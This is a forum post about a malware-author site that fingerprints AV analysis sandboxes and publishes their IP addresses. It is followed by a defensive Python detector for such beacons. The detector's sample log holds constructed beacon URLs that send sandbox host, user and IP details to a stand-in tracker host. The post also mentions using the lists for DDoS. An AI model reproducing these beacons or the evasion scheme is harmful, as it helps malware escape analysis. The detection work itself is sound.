Hi malware fighters,
Just a couple of days ago a website for malcreants went online to protect their malicious creations against analysis and research by AV vendors. AV Tracker publishes information on the automated analysis systems used by AV analysts. The malcreant uploads a file to the AV coder's system and waits for execution. This file then "rings home" with additional system information that could be used to blacklist AV IP addresses.
The collected information is then published at "AV Tracker", exposing information about the analysis systems. Besides some well-known AV companies, CWSandbox and Anubis were also affected.
We analyzed the binary and found that it sends a simple HTTP request, in which all extracted information is encoded. An example of an analysis report generated by one of the samples is http://anubis.iseclab.org/?action=result&task_id=361b5a8ee7235954252b02d33b3a7d24. This can be defeated by blocking access to the reporting server or by regularly changing the IP address of the analysis systems, but in the end this will be some kind of arms race again.
At the moment, lists have been made for Bitdefender, Kaspersky, VirusTotal and ThreatExpert. According to the maker of AV Tracker, the IP lists can also be used for launching an anti-AV DDoS attack.
A similar malcreant initiative was launched here: http://tra.cker.mobi/
polonus (malware fighter)
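The post describes the beacon as a simple HTTP request with the collected system details encoded into it, and blocking the reporting server as one countermeasure. The script below is an added example, not code from the post, from AV Tracker, or from the Anubis/iSecLab analysis: it scans a constructed egress log of the kind a sandbox proxy would keep (VM name, method, URL; all hostnames, VM names and 10.0.0.x addresses are invented), percent-decodes and base64-decodes query parameters, and flags requests that carry several fingerprint fields (host, user, ip, cpu, os, ...) or the analysis VM's own address. The flagged destinations are collected into a block list for the sandbox's egress filter.

```python
import base64
import binascii
import re
from urllib.parse import parse_qsl, quote, urlsplit

# Constructed sample data. The egress addresses, VM names and domains are invented
# for this example; a real deployment would read its proxy log and its own VM inventory.
SANDBOX_ADDRS = {"10.0.0.21", "10.0.0.22"}
_ENCODED_BEACON = quote(
    base64.b64encode(b"host=SANDBOX-01;user=analyst;ip=10.0.0.21;cpu=QEMU Virtual CPU").decode(),
    safe="",
)
SAMPLE_LOG = f"""\
vm01 GET http://update.example-cdn.test/check?v=3
vm01 GET http://report.evil-tracker.test/r.php?d={_ENCODED_BEACON}
vm02 GET http://stats.evil-tracker.test/ping?host=SANDBOX-02&user=cwsb&ip=10.0.0.22&os=WinXP
vm02 GET http://example.test/index.html
vm02 POST http://example.test/login?user=bob
"""

# Field names a system-fingerprinting beacon typically carries. Two or more in one
# request, or the sandbox's own address anywhere in the payload, is treated as a leak.
FINGERPRINT_KEYS = ("host", "user", "ip", "cpu", "os", "mac", "hwid")
_B64_RE = re.compile(r"^[A-Za-z0-9+/_-]+={0,2}$")


def _decode_candidates(value):
    """Yield the raw parameter value and, when it is plausible base64, its decoded text."""
    yield value
    # parse_qsl already percent-decoded; a '+' that was not percent-encoded became ' '.
    text = value.replace(" ", "+").replace("-", "+").replace("_", "/")
    if len(text) >= 16 and len(text) % 4 == 0 and _B64_RE.match(text):
        try:
            yield base64.b64decode(text, validate=True).decode("utf-8", "replace")
        except (binascii.Error, ValueError):
            pass


def _fingerprint_keys(text):
    """Return the fingerprint field names that appear as `key=` tokens in text."""
    return {k for k in FINGERPRINT_KEYS if re.search(r"(?:^|[;&?,|])" + k + "=", text)}


def analyze_request(url):
    """Return a reason string if the request looks like a fingerprint beacon, else None."""
    query = urlsplit(url).query
    keys = set()
    leaked_addr = None
    for name, value in parse_qsl(query, keep_blank_values=True):
        if name in FINGERPRINT_KEYS:          # fields passed as plain query parameters
            keys.add(name)
        for text in _decode_candidates(value):  # fields packed into one encoded blob
            keys |= _fingerprint_keys(text)
            for addr in SANDBOX_ADDRS:
                if addr in text:
                    leaked_addr = addr
    if leaked_addr:
        return f"leaks sandbox address {leaked_addr}"
    if len(keys) >= 2:
        return "carries fingerprint fields " + ",".join(sorted(keys))
    return None


def analyze_log(log_text):
    """Scan 'vm method url' lines; return one finding per suspicious request, in log order."""
    findings = []
    for line in log_text.splitlines():
        if not line.strip():
            continue
        vm, method, url = line.split(maxsplit=2)
        reason = analyze_request(url)
        if reason:
            findings.append({"vm": vm, "method": method, "host": urlsplit(url).hostname, "reason": reason})
    return findings


def blocklist(findings):
    """Distinct reporting hosts to deny at the sandbox's egress proxy or firewall."""
    return sorted({f["host"] for f in findings})


if __name__ == "__main__":
    for f in analyze_log(SAMPLE_LOG):
        print(f"{f['vm']} -> {f['host']}: {f['reason']}")
    print("block:", blocklist(analyze_log(SAMPLE_LOG)))
```

Blocking the hosts this finds only closes the current reporting channel; as the post notes, the next sample will report somewhere else, so the script is a detector to run continuously, not a one-off fix.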